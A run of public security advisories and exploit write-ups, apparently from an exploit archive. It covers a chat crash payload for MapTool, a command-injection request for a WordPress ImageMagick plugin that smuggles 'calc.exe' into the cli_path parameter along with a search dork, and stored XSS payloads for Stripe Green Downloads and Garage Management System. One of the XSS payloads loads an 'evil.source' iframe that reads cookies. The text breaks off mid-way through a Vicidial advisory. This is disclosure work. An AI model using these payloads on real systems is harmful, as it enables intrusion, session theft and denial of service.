<pre><code>Document Title:<br />===============<br />MapTool v1.11.5 - Denial of Service Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2318<br /><br /><br />Release Date:<br />=============<br />2022-10-10<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2318<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.7<br /><br /><br />Vulnerability Class:<br />====================<br />Denial of Service<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool come with powerful tools for creating detailed maps<br />but also a chat function, an initiative tracker, and a detailed token management system to create characters, monsters, objects,<br />and anything you can imagine. MapTool's user interface is highly configurable, and features not being used can be hidden out of sight.<br />The latest version of MapTool can be found on GitHub. MapTool attempts to use Semantic Versioning to help groups know whether a change<br />may break their game or not so they can decide when to upgrade. Exciting new features can be tested in development (alpha or beta) builds,<br />but for your game where stability matters sticking to the major releases is recommended. MapTool campaigns saved in newer versions may not<br />work on older versions, so be careful with your campaign files when trying out development builds.<br /><br />(Copy of the Homepage:https://wiki.rptools.info/index.php/MapTool )<br />(Download Software:https://www.rptools.net/toolbox/download-rptools-products )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a remote denial of service vulnerability in the official MapTool v1.11.5 software.<br /><br />Affected Product(s):<br />====================<br />Rptools<br />Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-06-03: Researcher Notification & Coordination (Security Researcher)<br />2022-06-04: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-10-10: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />No User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />The remote denial of service software vulnerability is located in the chat function of the official MapTool v1.11.5 windows software.<br />Attackers with chat access can transmit a malformed special crafted payload that returns a null pointer in javax.swing.text.html.StyleSheet<br />(javax.swing.text.View) and javax.swing.text.html.BlockView.layoutMinorAxis. Attacker are able to inject payloads to crash the application<br />immediatly and permanently. The compromised communication and project can be saved as cmpgn file and crashs the application on each import<br />with the unhandled null pointer exception.<br /><br />Vulnerable Module(s):<br />[+] Chat (Werkzeuge / Tools)<br /><br />Vulnerable Function(s):<br />[+] javax.swing.text.html.StyleSheet$BoxPainter<br />[+] javax.swing.text.html.BlockView.layoutMinorAxis<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The remote denial of service vulnerability can be exploited by remote attacker or without interaction or local users.<br />For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.<br /><br />Manual steps to reproduce the vulnerability locally:<br />1. Install the maptool newst version<br />2. Start the tool and open a own host<br />3. Open the message chat box<br />4. Include the payload and push the send button<br />5. The software crashs locally by null pointer<br />Note: open the client again and copy the chat with a cmpgn file<br />6. Now you can locally import it to crash the host via null pointer<br /><br />Manual steps to reproduce the vulnerability remotely:<br />1. Install the maptool newst version<br />2. Start the tool and join an exisiting party<br />3. Open the chat<br />4. Inject the payload with a local js or base64 encoded link and submit it<br />5. The host receives the chat message and clicks the link the host session crashs via null pointer<br /><br />Payload:<br /><FRAMESET></FRAMESET><br /><br />PoC:<br />testfile.cmpgn<br /><br />--- Debug Session Logs ---<br />java.lang.ArrayIndexOutOfBoundsException: Index 1 out of bounds for length 1<br />at java.desktop/javax.swing.text.html.BlockView.layoutMinorAxis(Unknown Source)<br />at java.desktop/javax.swing.text.html.HTMLEditorKit$HTMLFactory$BodyBlockView.layoutMinorAxis(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.layout(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSize(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.updateChildSizes(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.layout(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSize(Unknown Source)<br />at java.desktop/javax.swing.plaf.basic.BasicTextUI$RootView.setSize(Unknown Source)<br />at java.desktop/javax.swing.plaf.basic.BasicTextUI.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.JComponent.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.JEditorPane.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.ScrollPaneLayout.layoutContainer(Unknown Source)<br />at java.desktop/java.awt.Container.layout(Unknown Source)<br />at java.desktop/java.awt.Container.doLayout(Unknown Source)<br />at java.desktop/java.awt.Container.validateTree(Unknown Source)<br />at java.desktop/java.awt.Container.validate(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source)<br />at java.base/java.security.AccessController.doPrivileged(Unknown Source)<br />at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager.validateInvalidComponents(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$ProcessingRunnable.run(Unknown Source)<br />at java.desktop/java.awt.event.InvocationEvent.dispatch(Unknown Source)<br />at java.desktop/java.awt.EventQueue.dispatchEventImpl(Unknown Source)<br />at java.desktop/java.awt.EventQueue$4.run(Unknown Source)<br />at java.desktop/java.awt.EventQueue$4.run(Unknown Source)<br />at java.base/java.security.AccessController.doPrivileged(Unknown Source)<br />at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source)<br />at java.desktop/java.awt.EventQueue.dispatchEvent(Unknown Source)<br />at net.rptools.maptool.client.swing.MapToolEventQueue.dispatchEvent(MapToolEventQueue.java:54)<br />at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)<br />at java.desktop/java.awt.WaitDispatchSupport$2.run(Unknown Source)<br />at java.desktop/java.awt.WaitDispatchSupport$4.run(Unknown Source)<br />at java.desktop/java.awt.WaitDispatchSupport$4.run(Unknown Source)<br />at java.base/java.security.AccessController.doPrivileged(Unknown Source)<br />at java.desktop/java.awt.WaitDispatchSupport.enter(Unknown Source)<br />at java.desktop/java.awt.Dialog.show(Unknown Source)<br />at java.desktop/java.awt.Component.show(Unknown Source)<br />at java.desktop/java.awt.Component.setVisible(Unknown Source)<br />at java.desktop/java.awt.Window.setVisible(Unknown Source)<br />at java.desktop/java.awt.Dialog.setVisible(Unknown Source)<br />at net.rptools.maptool.client.swing.MapToolEventQueue.displayPopup(MapToolEventQueue.java:109)<br />at net.rptools.maptool.client.swing.MapToolEventQueue.dispatchEvent(MapToolEventQueue.java:73)<br />at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.run(Unknown Source)<br />-<br />Java.lang.NullPointerException: Cannot invoke "javax.swing.text.html.StyleSheet$BoxPainter.getInset(int, javax.swing.text.View)" because "this.painter" is null<br />at java.desktop/javax.swing.text.html.TableView.updateInsets(Unknown Source)<br />at java.desktop/javax.swing.text.html.TableView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.getMinimumSpan(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.html.BlockView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.getMinimumSpan(Unknown Source)<br />at java.desktop/javax.swing.text.html.BlockView.getMinimumSpan(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.html.BlockView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.html.HTMLEditorKit$HTMLFactory$BodyBlockView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.getMinimumSpan(Unknown Source)<br />at java.desktop/javax.swing.text.html.BlockView.getMinimumSpan(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.html.BlockView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.layout(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSize(Unknown Source)<br />at java.desktop/javax.swing.plaf.basic.BasicTextUI$RootView.setSize(Unknown Source)<br />at java.desktop/javax.swing.plaf.basic.BasicTextUI.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.JComponent.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.JEditorPane.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.ScrollPaneLayout.layoutContainer(Unknown Source)<br />at java.desktop/java.awt.Container.layout(Unknown Source)<br />at java.desktop/java.awt.Container.doLayout(Unknown Source)<br />at java.desktop/java.awt.Container.validateTree(Unknown Source)<br />at java.desktop/java.awt.Container.validate(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source)<br />at java.base/java.security.AccessController.doPrivileged(Unknown Source)<br />at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager.validateInvalidComponents(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$ProcessingRunnable.run(Unknown Source)<br />at java.desktop/java.awt.event.InvocationEvent.dispatch(Unknown Source)<br />at java.desktop/java.awt.EventQueue.dispatchEventImpl(Unknown Source)<br />at java.desktop/java.awt.EventQueue$4.run(Unknown Source)<br />at java.desktop/java.awt.EventQueue$4.run(Unknown Source)<br />at java.base/java.security.AccessController.doPrivileged(Unknown Source)<br />at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source)<br />at java.desktop/java.awt.EventQueue.dispatchEvent(Unknown Source)<br />at net.rptools.maptool.client.swing.MapToolEventQueue.dispatchEvent(MapToolEventQueue.java:54)<br />at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.run(Unknown Source)<br /><br /><br />Security Risk:<br />==============<br />The security risk of the remote denial of service vulnerability in the maptool software is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)<br /># Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/"<br /># Date: Thursday, September 1, 2022<br /># Exploit Author: ABDO10<br /># Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/<br /># Software Link: https://github.com/orangelabweb/imagemagick-engine/<br /># Version: <= 1.7.4<br /># Tested on: windows 10<br /><br />-- vulnerable section<br />https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529<br /><br />-- payload on windows: d&calc.exe&anything<br />-- on unix : notify-send "done"<br />-- exploit :<br /><br />GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload]<br />HTTP/1.1<br />Host: localhost<br />Cookie: wordpress_sec_xx=; wp-settings-time-1=;<br />wordpress_test_cookie=; wordpress_logged_in_xx=somestuff<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0)<br />Gecko/20100101 Firefox/104.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine<br />X-Requested-With: XMLHttpRequest<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Stripe Green Downloads 2.03 - Cross Site Web Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2287<br /><br /><br />Release Date:<br />=============<br />2022-10-17<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2287<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.2<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Easily configure the plugin to accept payments through Stripe with Strong Customer Authentication. Easily style payment button<br />with overall styling settings. Tons of options for any needs. Host files in secured folder, Media Library (WordPress plugin only)<br />or anywhere on your server. Send custom email notifications to buyer and administrator after successful payments. Collect statistics<br />of button impressions, payments and downloads for any file for any period.<br /><br />(Copy of the Homepage:https://halfdata.com/green-downloads/stripe/ )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Stripe Green Downloads web-application and wordpress plugin.<br /><br /><br />Affected Product(s):<br />====================<br />halfdata<br />Product: Stripe Green Downloads - Admin Panel v1.0 (Web-Application)<br />Product: Stripe Green Downloads - Wordpress Plugin 2.03 (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-10-17: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Moderator Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent input validation web vulnerability has been discovered in the Stripe Green Downloads web-application and wordpress plugin v2.03.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to<br />web-application requests from the application-side.<br /><br />The persistent xss web vulnerability is located in the `Label`, `Processing label` and `Download label` input fields of the<br />`Green Downloads - Settings - Button` module. Attackers with local privileged to access the panel are able to inject own<br />malicious script code to the button that executes the content in the preview context. The request method to inject is post<br />and the attack vector is persistent on the application-side. The vulnerable parameters are `idcore-button-label`,<br />`idcore-button-label-processing` and `idcore-button-label-download`.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent<br />external redirects to malicious source and non-persistent manipulation of affected application modules.<br /><br />Vulnerable Module(s):<br />[+] Green Downloads - Settings - Button<br /><br />Vulnerable Input(s):<br />[+] Label<br />[+] Processing label<br />[+] Download label<br /><br />Vulnerable Parameter(s):<br />[+] idcore-button-label<br />[+] idcore-button-label-processing<br />[+] idcore-button-label-download<br /><br />Affected Module(s):<br />[+] Preview (/stripe/script/?page=idcore-settings)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side cross site scripting web vulnerability can be exploited by remote attackers with privileged account and with low user interaction.<br />For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Vulnerable Source: /stripe/script/?page=idcore-settings<br /><tbody><tr><td colspan="2"><hr></td></tr><br /><tr><th>Preview:</th><td><br /><div id="idcore-preview-content" class="idcore-preview-container"><link href="//x/css?family=Strait:100,200,300,400,500,600,700,800,900&<br />subset=arabic,vietnamese,hebrew,thai,bengali,latin,latin-ext,cyrillic,cyrillic-ext,greek" rel="stylesheet"<br />type="text/css"><style>.idcore-preview-button{font-family:'Strait','arial';font-size:20px;color:#ffffff;font-weight:normal;font-style:normal;<br />text-decoration:none;text-transform:uppercase;width:250px;height:56px;line-height:56px;background-color:#d4150b;<br />background-image:linear-gradient(to bottom,rgba(255,255,255,.05) 0,rgba(255,255,255,.05) 50%,rgba(0,0,0,.05) 51%,rgba(0,0,0,.05) 100%);<br />border-width:1px;border-style:solid;border-color:#d4150b;border-radius:3px;box-shadow: 2px 2px 0px 0px rgba(68, 68, 68, 0.2);}</style><br /><span id="idcore-preview-button" class="idcore-preview-button idcore-preview-button-shift-down" onclick="return idcore_switch_preview_button_state();"<br />data-label="Buy Now:>"<iframe src=evil.source onload=alert(document.cookie)> 5.00 USD"<br />data-label-processing="Processing...>"<iframe src=evil.source onload=alert(document.cookie)>"<br />data-label-download="Download Now!>"<iframe src=evil.source onload=alert(document.cookie)>"<br />data-state="3">Download Now!>"<iframe src="evil.source" onload="alert(document.cookie)"></iframe></span></div><br /></td></tr></tbody><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://green-downloads.localhost:8080/green-downloads/demo/stripe/script/ajax.php<br />Host: green-downloads.localhost:8080<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 4829<br />Origin:https://green-downloads.localhost:8080<br />Connection: keep-alive<br />Referer:https://green-downloads.localhost:8080/green-downloads/demo/stripe/script/?page=idcore-settings<br />Cookie: uap-auth=njqYqYrjVyg7aWCO; __stripe_mid=2939b7be-7000-43b1-9940-d26f391ae745ab4b3a; __stripe_sid=0813d899-c76d-4b14-832d-d55565cd96dbdc938<br />Post: Admin Panel&idcore-button-label=Buy Now:>"<iframe src=evil.source onload=alert(document.cookie)> {price} {currency}<br />&idcore-button-label-processing=Processing...>"<iframe src=evil.source onload=alert(document.cookie)><br />&idcore-button-label-download=Download Now!>"<iframe src=evil.source onload=alert(document.cookie)>&idcore-button-size=fixed&idcore-button-width=250<br />&idcore-button-height=56&idcore-button-padding-top=16&idcore-button-padding-right=32&idcore-button-padding-bottom=16<br />&idcore-button-padding-left=32&idcore-responsiveness-size=480&idcore-responsiveness-custom=480&idcore-button-text-family=Strait<br />&idcore-button-text-size=20&idcore-button-text-transform=uppercase&idcore-button-text-color=#ffffff&idcore-button-background-image=<br />&idcore-button-background-size=auto&idcore-button-background-hposition=left&idcore-button-background-vposition=top<br />&idcore-button-background-repeat=repeat&idcore-button-background-color=#d4150b&idcore-button-background-gradient=2shades&idcore-button-background-color2=<br />&idcore-button-border-width=1&idcore-button-border-style=solid<br />&idcore-button-border-radius=3&idcore-button-border-left=on&idcore-button-border-top=on&idcore-button-border-bottom=on<br />&idcore-button-border-right=on&idcore-button-border-color=#d4150b&idcore-button-shadow-size=small&idcore-button-shadow-style=solid<br />&idcore-button-shadow-color=rgba(68, 68, 68, 0.2)&idcore-button-hover-inherit=on&idcore-button-hover-text-family=Strait&idcore-button-hover-text-size=20<br />&idcore-button-hover-text-transform=uppercase&idcore-button-hover-text-color=#ffffff&idcore-button-hover-background-image=<br />&idcore-button-hover-background-size=auto&idcore-button-hover-background-hposition=left&idcore-button-hover-background-vposition=top<br />&idcore-button-hover-background-repeat=repeat&idcore-button-hover-background-color=#d4150b&idcore-button-hover-background-gradient=2shades<br />&idcore-button-hover-background-color2=&idcore-button-hover-border-width=1&idcore-button-hover-border-style=solid&idcore-button-hover-border-radius=3<br />&idcore-button-hover-border-left=on&idcore-button-hover-border-top=on&idcore-button-hover-border-bottom=on&idcore-button-hover-border-right=on<br />&idcore-button-hover-border-color=#d4150b&idcore-button-hover-shadow-size=small&idcore-button-hover-shadow-style=solid<br />&idcore-button-hover-shadow-color=rgba(68, 68, 68, 0.2)&idcore-button-active-inherit=on&idcore-button-active-text-family=Strait&idcore-button-active-text-size=20<br />&idcore-button-active-text-transform=uppercase&idcore-button-active-text-color=#ffffff&idcore-button-active-background-image=<br />&idcore-button-active-background-size=auto&idcore-button-active-background-hposition=left&idcore-button-active-background-vposition=top<br />&idcore-button-active-background-repeat=repeat&idcore-button-active-background-color=#d4150b&idcore-button-active-background-gradient=2shades<br />&idcore-button-active-background-color2=&idcore-button-active-border-width=1&idcore-button-active-border-style=solid&idcore-button-active-border-radius=3<br />&idcore-button-active-border-left=on&idcore-button-active-border-top=on&idcore-button-active-border-bottom=on&idcore-button-active-border-right=on<br />&idcore-button-active-border-color=#d4150b&idcore-button-active-shadow-size=small&idcore-button-active-shadow-style=solid<br />&idcore-button-active-shadow-color=rgba(68, 68, 68, 0.2)&idcore-button-active-transform=shift-down&idcore-amazon-access-key=&idcore-amazon-secret-key=<br />&idcore-amazon-bucket=&idcore-error-invalid-link=Invalid download link.&idcore-error-expired-link=Download link expired.<br />&idcore-error-no-file=File does not exist.&idcore-link-lifetime=72&idcore-csv-separator=;&idcore-cross-domain-enable=on&idcore-admin-menu-stats=on<br />&action=idcore-update-settings&idcore_version=2<br />-<br />POST: HTTP/1.1 200 OK<br />Server: Apache/2.4.18 (Ubuntu)<br />Access-Control-Allow-Origin: *<br />Content-Length: 68<br />Keep-Alive: timeout=5, max=96<br />Connection: Keep-Alive<br />Content-Type: text/html; charset=utf-8<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent input validation web vulnerability in the stripe application and wordpress plugin is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: Garage Management System 1.0 - 'categoriesName' - Stored<br />XSS<br /># Date: 18-09-2022<br /># Exploit Author: Sam Wallace<br /># Software Link:<br />https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html<br /># Version: 1.0<br /># Tested on: Debian<br /># CVE : CVE-2022-41358<br /><br />Summary:<br />Garage Management System utilizes client side validation to prevent XSS.<br />Using burp, a request can be modified and replayed to the server bypassing<br />this validation which creates an avenue for XSS.<br /><br />Parameter: categoriesName<br />URI: /garage/php_action/createCategories.php<br /><br />POC:<br />POST /garage/php_action/createCategories.php HTTP/1.1<br />Host: 10.24.0.69<br />Content-Length: 367<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://10.24.0.69<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://10.24.0.69/garage/add-category.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u<br />Connection: close<br /><br />------WebKitFormBoundaryqKDsN4gmatTEEkhS<br />Content-Disposition: form-data; name="categoriesName"<br /><br /><script>alert(1)</script><br />------WebKitFormBoundaryqKDsN4gmatTEEkhS<br />Content-Disposition: form-data; name="categoriesStatus"<br /><br />1<br />------WebKitFormBoundaryqKDsN4gmatTEEkhS<br />Content-Disposition: form-data; name="create"<br /><br /><br />------WebKitFormBoundaryqKDsN4gmatTEEkhS--<br /></code></pre>
<pre><code>Document Title:<br />===============<br />Vicidial v2.14-783a - Multiple XSS Web Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2311<br /><br /><br />Release Date:<br />=============<br />2022-10-11<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2311<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.2<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Non Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act<br />as a complete inbound/outbound contact center suite with inbound email support as well. The agent interface is an<br />interactive set of web pages that work through a web browser to give real-time information and functionality with<br />nothing more than an internet browser on the client computer. The management interface is also web-based and<br />offers the ability to view many real-time and summary reports as well as many detailed campaign and agent options<br />and settings. VICIDIAL can function as an ACD for inbound calls or for Closer calls coming from VICIDIAL outbound<br />fronters and even allows for remote agents logging in from remote locations as well as remote agents that may only<br />have a phone. There are currently over 24,000 installations of VICIDIAL in production in over 100 countries around<br />the world, several with over 300 agent seats and many with multiple locations.<br /><br />(Copy of the Homepage:https://www.vicidial.org/vicidial.php )<br />(Download:https://www.vicidial.org/vicidial.php )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple client-site cross site scripting vulnerabilities in the VICIDIAL v2.14-783a web-application.<br /><br />Affected Product(s):<br />====================<br />Vicidial Group<br />Product: Vicidial v2.14-783a - (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-15: Researcher Notification & Coordination (Security Researcher)<br />2022-01-16: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements 